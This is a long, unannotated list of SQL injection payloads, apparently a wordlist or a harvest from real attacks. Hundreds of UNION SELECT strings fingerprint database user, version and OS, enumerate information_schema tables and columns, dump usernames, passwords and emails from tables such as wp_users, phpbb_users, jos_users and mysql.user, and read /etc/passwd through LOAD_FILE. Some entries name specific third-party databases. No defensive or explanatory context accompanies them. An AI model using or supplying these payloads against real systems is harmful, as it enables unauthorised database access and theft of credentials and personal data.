1,concat_ws(0x3a,pass,name),3 from users/* -1 union select 1,concat_ws(0x3a,Passw,Admin),3,4,5,6,7 from admin-- -1 union select 1,concat_ws(0x3a,password,username),3,4,5 from users-- -1 union select 1,concat_ws(0x3a,table_name),3,4,5,6,7 from information_schema.tables -1 union select 1,concat_ws(0x3a,user(),database(),version())/* 1 union select 1,concat_ws(0x3a,user(),database(),version()) -- 1 union select 1,concat_ws(0x3a,user(),database(),version())-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3 -- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3-- -1 UNION SELECT 1,concat_ws(0x3a,user(),database(),version()),3,4 -- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5-- -1' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5/* -1' union select 1,concat_Ws(0x3a,user(),database(),version()),3,4,5 -- -1 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6 -1' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6-- -1 UNION SELECT 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6 -1 UNION SELECT 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6 -- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/* 1' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/* -1 UNION SELECT 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8 -- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9 -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/* -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 -- -1 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9,10,11,12 -1' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12# -1 union select 1,concat_Ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13/* -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -1 UNION SELECT 1,concat_Ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -1' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -1 union select 1,concat_Ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 /* -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- -1 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 1' union select 1,concat_ws(0x3a,user(),database(),version()),3 from mysql.user -- -1 union select 1,concat_ws(0x3a,user(),database(),version(),@@version_compile_os)-- -1 union select 1,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),3,4 -- -1 union select 1,concat_ws(0x3a,User_login,user_pass),3,4,5,6,7,8,9,10 from wp_users -- -1 union select 1,concat_ws(0x3a,username,lastlogin,password,email),3,4,5,6,7,8,9,10,11,12,13,14 from admin_login/* -1 union select 1,concat_ws(0x3a,username,passwd),3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15 from user/* -1 union select 1,concat_ws(0x3a,username,password),3,4,5 from members -- -1 union select 1,concat_ws(0x3a,username,password,email),3,4,5,6,7 from itt_reviewer limit 0,1/* 1 UNION SELECT 1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15 from signup-- -1 union select 1,concat_ws(0x3a,USERNAME,USERPASS,EMAIL),3,4 from TB_LOGIN limit 0,1/* -1 UNION SELECT 1,concat_ws(0x3a,username,userpass) FROM poll_user/* 1/**/union/**/select/**/1,concat_ws(0x3a,username,user_password),3,4,5 from nuke_phpbb_users/**/limit/**/2,1/* -1 union select 1,concat_ws(0x3a,username,user_password),3,4 from phpbb_users-- -1 union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13 from phpsp_users-- -1 union select 1,concat_ws(0x3a,user,password),3,4,5,6 from admin/* -1 union select 1,concat_ws(0x3a,user,password),3,4,5,6 from mysql.user-- -1' union select 1,concat_ws(0x3a,user,password),3,4,5,6 from mysql.user/* -1 union select 1,concat_ws(0x3a,user,password) from mysql.user limit 0,1/* -1 union select 1,concat_ws(0x3a,user,psw),3,4,5,6,7 from prelude-- -1 union select 1,concat_ws(0x3a,user,psw),3,4,5,6 from admin-- -1 union select 1,concat_ws(0x3a,userUserName,userPassword,userID),3,4,5,6,7,8,9,10 from users-- -1' union select 1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 -- -1 union select 1,concat_ws(0x3a,user(),version(),database())/* -1 union select 1,concat_ws(0x3a,user(),version(),database()),3/* -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5-- -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/* -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7-- -1' UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7/* 1 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7/* -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8-- -1' union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9-- -1' union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10/* -1 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10-- -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- 1 UNION SELECT 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14 LIMIT 1,1/* 1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7 limit 1,1/* 1 union select 1,concat_ws(0x3a,user(),version(),database()),3 limit 1,1/* -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os) -- -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5-- -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6-- -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7 -- -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8-- -1 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13-- 1 union select 1,concat_ws(0x3a,usuario,password),3,4,5,6,7,8,9,10,11 from smartene_SEH.usuarios-- -1 union select 1,concat_ws(0x3a,version(),database(),user()) -1 union select 1,concat_ws(0x3a,version(),database(),user())/* -1' union select 1,concat_ws(0x3a,version(),database(),user()) -- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3/* -1' union select 1,concat_ws(0x3a,version(),database(),user()),3/* -1 union select 1,concat_Ws(0x3a,version(),database(),user()),3-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4/* -1' union select 1,concat_ws(0x3a,version(),database(),user()),3,4/* 1' union select 1,concat_ws(0x3a,version(),database(),user()),3,4 -- 1 union Select 1,concat_ws(0x3a,version(),database(),user()),3,4 -- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5-- -1' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5 -- 1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/* -1' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6/* -1 union Select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6 -- 1' union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7# 1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8 -- 1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/* -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13/* -1 union Select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15 -- -1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -1 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- 1' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3/* -1 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7/* 1 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7-- -1 UNION SELECT 1, concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -1 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -1 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -1') union select 1,concat_ws(0x3A,version(),user(),database())-- -1 union select 1,concat_ws(0x3a,version(),user(),database()),3/* -1' union select 1,concat_ws(0x3a,version(),user(),database()),3,4/* -1 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5 -- -1 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5-- -1' union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5-- -1' union select 1,concat_Ws(0x3a,version(),user(),database()),3,4,5 -- -1 Union select 1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15/* -1 union selecT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -1 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* -1 UNION SELECT 1,concat_ws(0x3a,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51-- 1 union select 1,concat_ws(0x3a,VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/* -1' union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13 from mysql.user -- -1 union select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os)-- -1 union select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os)-- -1 union select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4-- -1 union select 1,concat_ws(0x3a,version(),user(),@@version_compile_os),3,4-- 1 union select 1,concat_ws(0x3a,vUser,vPassword,vAdmin_email),3,4,5,6,7,8,9,0 from admin-- -1 union select 1,concat_ws(0x3b,user(),database(),version()),3,4,5,6,7,8,9,10,11,12/* 1 union select 1,concat_ws(0x3,user(),0x3,database(),0x3,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 1 union select 1,concat_ws(0x3,version(),user(),database())/* -1 union select 1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -1 union select 1,concat_ws(0x7c,database(),0x7c,user(),0x7c,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 -1 union select 1,concat_ws(0x7c,user(),0x7c,database(),0x7c,version()),3,4,5 -1 union select 1,concat_ws(0xb,version(),user(),database()),3,4,5,6,7,8,9,10,11,12/* -1 union select 1,concat_ws(char(32,45,32),username,password),3,4,5 from naira_clients.tbladmins-- -1 union select 1,concat_ws(char(32,45,32),Username,Password,testoMail,refMail,mail2,contratto,contratto_eng,contratto_ita,allegato_eng,allegato_ita,brochure_ita,brochure_eng,last_access,last_ip),3,4,5,6 from nav_settings-- -1 union select 1,concat_ws(char(32,45,32),version(),user(),database()),3,4,5,6,7,8,9-- -1 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),3,4,5,6-- -1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -1 UNION SELECT 1,CONCAT_WS(CHAR(42),VERSION(),USER(),DATABASE()),3,4,5,6,7,8,9,0 -- -1 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8-- -1 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13/* -1 union SELECT 1,concat_ws(char(58,58),user_id,user_email,password,password2) FROM fwd_users/* -1 union select 1,concat_ws(char(58,58),version(),database(),user()),3,4/* -1 union select 1,concat_ws(char(58),apassword,aemail),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from access/* -1 union select 1,concat_ws(CHAR(58),DATABASE(),USER(),VERSION()),3,4/* -1 union select 1,concat_ws(char(58),name,pass),3,4 from users limit 1 offset 2/* -1 union select 1,concat_ws(char(58),version(),user(),database()),3,4,5,6,7,8,9,10,11/* -1' union select 1,concat_ws(char(58),version(),user(),database(),@@version_compile_os),3,4-- -1 union select 1,concat_ws(login,0x3a,password) from dir_login/* -1 union select 1,concat_ws(';',login,password),3,4,5,6,7,8,9 from users_admin limit 1,1/* -1 union select 1,concat_ws(user(),version(),database(),@@version_compile_os)-- -1 union select 1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11-- -1 union select 1,concat_ws(version(),database(),user()),3-- -1 union select 1,concat_ws(version(),database(),user()),3,4,5,6,7-- -1 UNION SELECT 1,CONCAT_ws(Version(),Database(),User()),3,4,5,6,7,8-- -1 union select 1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9-- -1 UNION SELECT 1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -1 union select 1,concat_ws(version(),database(),user(),@@version_compile_os),3,4-- -1 union select 1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11/* -1 UNION SELECT 1,concat_ws(version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -1 union select 1,convert(concat(database(),char(58),user(),version()),char),3,4/* -1 union select 1,convert(concat(name,char(58),pass),char),3,4 from users/* -1 union select 1,convert(concat(user(),0x3a,database(),0x2a,version()),binary)/* -1 union select 1,convert(concat(version(),0x3a,user(),0x3a,database()),binary),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -1 union select 1,convert(concat(version(),char(58,58),database(),char(58,58),user()) using cp1251),3/* -1 union select 1,convert(concat_ws(0x3a,user(),database(),version()) using latin1),3,4/* -1 union select 1,convert(concat_ws(0x3a,user_login,user_pass,user_email,user_url,user_status,user_nicename) using latin1),3,4,5,6,7,8 from wp_users limit 0,1/* 1 UNION SELECT 1,convert(concat_ws(0x3a,version(),user(),database()) using latin1),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -1 union select 1,convert(table_name using latin7),3,4 from information_schema.tables -1 union select 1,convert(user() using cp1251)/* -1 UNION SELECT 1,convert(version(),binary),3,4,5,6,convert(user(),binary)/* -1 union select 1,convert(version(),char)/* -1 union select 1,convert(version(),char),3,4,5,6,7,8 from mysql.user/* -1 union select 1,convert(version(),char),3,4,5 from users/* -1 union select 1,convert(version() using latin1),3,4,5,6,7,8,9,10,11/* -1 union select 1,database(),3,4,5 -- 1 union select 1,database(),3,4,5 -1 union select 1,database(),3,4,5,6,7,8,user(),version(),11/* 1 union select 1,DATABASE(),3,4,USER(),VERSION(),7,8,9/* -1 union select 1,database(),3,user(),version()/* -1 union select 1,database(),3,version()/* -1 UNION SELECT 1,database(),3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,user(),28,29,30,31,32,33,34,35,36,37,38,39,40 -- -1 union select 1,database(),table_name,4,5,6,7,8,9,11,12-- -1 union select 1,database(),user(),version()/* -1 union select 1,database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -1 union select 1,database(),version(),4,5,6,7,8,user(),10,11,12,13,14 -- 1 union select 1,database(),version(),user(),5,6,7,8/* -1 UNION SELECT 1,database(),version(),user(),5,6,7,8,9,10,11,12,13/* -1 union select 1,email,3,4,5,6,7,8,9,10,11,12,13,14,pass,16,17,18,19,20,21,22,23 from nuke_users where uid=2 -1 union select 1,email,3,4 from cpAccounts where level=3/* -1 union select 1,email,3,4,password from members limit 31,1/* 1 union select 1 from admins-- -1' UnioN SElect 1 from authors -- 1 union select 1 from(select count(*),concat((select concat_ws(0x3a,user,password,file_priv) from mysql.user limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a -1 union select 1,group_concat(0x0b,table_name),3,4 from information_schema.tables -- -1 union select 1,group_concat(0x3a,version(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- -1 union select 1,group_concat(0x3b,user_name,password),3,4,5,6,7,8 from users-- -1 union select 1,group_concat(account_email,0x3a,account_user,0x3a,account_pass) from accounts-- -1 union select 1,group_concat(account_user,0x3a,account_pass,0x0a) from accounts -- -1 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 from information_schema.columns where table_namex6163636573735f616363-- -1 union select 1,group_concat(concat_ws(0x3a,username,password) separator 0x0b),3 from adminaccounts -- -1 union select 1,group_concat(database(),0x3a,user(),0x3a,version()) -- -1 union select 1,group_concat(database(),0x3a,user(),0x3a,version()),3,4,5,6,7,8,9,10,11-- -1 union select 1,group_concat(id,0x3a,group_name,0x3a,picture_id),3 from group_data -- -1 UNION SELECT 1,group_concat(id,0x3A,type_currency,0x3A,name_deposit,0x3A,type_deposit,0x3A,period,0x3A,percent,0x3A,first_deposit,0x3A,general_conditions,0x3A,activ,0x3A,language,0x3A,cur_date,0x3A),3,4,5,6,7,8,9,10 FROM qqb.deposit-- -1 UNION SELECT 1,GROUP_concat(id,0x3a,username,0x3a,password),3,4 from user -1 union select 1,group_concat(login,0x3a,pass,0x3a,mail,0x0b) from user -- -1 union select 1,group_concat(name,0x3a,password),3,4,5,6,7,concat_ws(0x3a3a,user(),version(),database()),9,10,11,12,13,14,15 from frb_users -- -1 union select 1,group_concat(table_name,0x3a,column_name),3,4,5,6,7 from information_schema.columns where column_name like 0x257061737325-- -1 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables -1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables 1 union Select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=0x6e65775f706f7274616c5f32303038 -- -1 union select 1,group_concat(table_name),3 from information_schema.tables -- 1 union select 1,group_concat(table_name),3 from information_schema.tables group by table_name -- -1 union select 1,group_concat(table_name) FROM information_schema.tables Where table_schema=0x626F6C6470726F787970746E6577-- -1 union select 1,group_concat(table_name,"\n"),3,4,5 from information_schema.tables-- -1 union select 1,group_concat(table_name separator 0x3a),3,4,5,6,7,8 from information_schema.tables where table_schema=0x7765626d6f72746f6e5f6b74736b-- 1 union select 1,group_concat(user,0x3a,password,0x3a,file_priv),3,4,5,6,7,8,9 from mysql.user-- -1 union select 1,group_concat(User,0x3b,Pass),3,4,5,6,7,8,9,10 from login -1 union select 1,group_concat(username,0x3a,email,0x3a,password,0x0a) from jos_users -- -1 union select 1,group_concat(user_name,0x3a,user_pass) from rd_users-- -1 union select 1,group_concat(username,0x3b,password),3,4,5,6 from mytbladminlogin -1 union select 1,group_concat(username,char(58),password),3,4 from administration_users-- -1' union select 1,group_concat(version(),0x3a,user(),0x3a,database())-- -1 union select 1,group_concat(version(),0x3a,user(),0x3a,database()),3 -- -1 union select 1,id,3 from users/* -1 UNION SELECT 1,id,login,4,5,name,id,8,9,10,11,12,13,14,15,16,17,18,9,19,20,21 from users/* -1 union select 1,LOAD_FILE('/etc/passwd'),3/* -1 union select 1,load_file('/etc/passwd'),3,4,5,6,7,8-- -1 union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9/* -1' union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10/* -1 union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11/* -1 union select 1,login,3,4,5,6,7,8,9,10,11,version(),13,14,15 from accounts limit 0,1/* -1 union select 1,login_name,3,4,5,6,7,8,9,10,11,12,13,14 loginform/* -1 union select 1,login,password,4,5,6,7 from users limit 1,3/* -1 union select 1,mail,3 from mail/* -1 union select 1,name from articles limit 1,1/* -1 union select 1,null,null,null,null,null-- -1 union select 1,null,null,null,sys.login_user from sys.dual-- -1 union select 1,null,null,null,table_name||chr(58)||column_name||chr(58)||data_type from (select a.*,rownum rnum from (select * from user_tab_columns where table_name=chr(76)||chr(79)||chr(71)||chr(73)||chr(78)||chr(83) order by column_name) a where rownum <= 1) where rnum >= 1-- -1 union select 1,pass,user(),6,5 from login/* -1 union select 1,password,3,4,5,6,7,8,9 from mysql.user/* -1 union select 1,password,3,4,5,6,7,user,9,10,11,12,13,14,15,16,17 from mysql.user-- -1 union select 1,password,3,4,5,user,7,8,9,10,11 from mysql.user limit 1,1-- -1 union select 1,password,3,4,email,6,7 from user/* -1 union select 1,password,3,4,username,6,7,8,9,10,11 from jos_users/* -1 union select 1,password,3,login,password from u14145_2.users/* -1 union select 1,password from users/* 1' UNION SELECT 1,password,name,4,5,6,id,8 from users/* -1 union select 1,password,user,4,5,6,7 from _user -- -1 union select 1,password,user from mysql.user/* -1 union select 1,password,username,4,5,6,7,8,9,0,1,2,3,4 from users/* -1 union select 1,SQL,3,4,5-- -1 union select 1,SQL,3,4,5,6,7-- 1 union select 1,substring(group_concat(unhex(hex(table_name))),250),3,4,5,6,7,8,9,10,11 from information_schema.tables -- -1 union select 1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from information_schema.tables limit 28,1/* -1 union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables limit 17,1-- -1 union select 1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from INFORMATION_SCHEMA.TABLES LIMIT 23,1/* -1 union select 1,table_name,3,4,5,6,7,8,9,10,11 from information_schema.tables/* -1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61 -1 union select 1,table_name,3,4,5,6 from information_schema.tables-- -1' union select 1,table_name,3,4,5,6 from information_schema.tables -- -1 union select 1,table_name,3,4,5,6 FROM INFORMATION_SCHEMA.TABLES limit 0,1 -- -1 union select 1,table_name,3,4,5,6 from information_schema.tables limit 1,100/* -1 union select 1,table_name,3,4,5 from information_schema.tables/* -1' union select 1,table_name,3,4,5 from information_schema.tables where table_name not in ('COLLATIONS','COLLATION','CHARACTER_SET','APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS','TABLES','TABLE_CONSTRAINTS','TABLE_PRIVILEGES','COLLATION_CHARACTER_SET_APPLICABILITY','TRIGGERS','PROFILING','USER_PRIVILEGES','VIEWS','CHARACTER_SETS','articles','newsrus','dbusers','newsukr','webnews')/* -1 union select 1,table_name,3,4 from information_schema.tables-- -1 union select 1,table_name,3 from information_schema.tables -- -1' union select 1,table_name,3,table_schema from information_schema.tables/* 1 union select 1,table_name from information_schema.tables/* -1 union select 1,table_name,table_schema,4,5 from information_schema.tables-- -1 union select 1,table_name,version(),4,5,6,7,table_schema,9 from information_schema.tables/* -1 union select 1,table_name,version(),4,user(),6,7 from information_schema.tables/* -1 union select 1,unhex(hex(concat(login,0x3a,password))) from partners limit 1,1/* -1 union select 1,unhex(hex(concat_ws(0x3a,login,pass_md5))) from hotelfrancepro1.admins-- -1 union select 1,unhex(hex(concat_ws(0x3a,Login,password,name,category_id,active,email,region,city,phone,id,name,count_open,old_date,url))),3 from users-- -1' union select 1,unhex(hex(concat_ws(0x3a,name,member_login_key))),3,4 from forum.ibf_members/* -1 union select 1,unhex(hex(concat_Ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9,10,11,12,13-- -1 union select 1,unhex(hex(concat_ws(0x3a,version()))),3,4-- -1 union select 1,unhex(hex(concat_ws(0x3a,version())),3,4,5-- -1 union select 1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5/* -1 uNIon sELEct 1,unhex(hex(group_concat(ColuMn_nAmE))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from infOrmAtion_schEmA.CoLumNs where table_name=0x74626C5F6D6172696E61 -- -1 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 from information_schema.tables-- -1 union select 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10 from information_schema.tables-- 1 union select 1,unhex(hex(version())),3 1 union select 1,unhex(hex(version())),3,4,5,6,7,8/* -1 union select 1,unhex(hex(version())),3,4,5,6,7,8,9/* 1 union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16 -1 union select 1,user() -1 union select 1,user() /* -1 UNION SELECT 1,user()-- -1 union select 1,USER(),1,VERSION(),1,1,1,1 /* 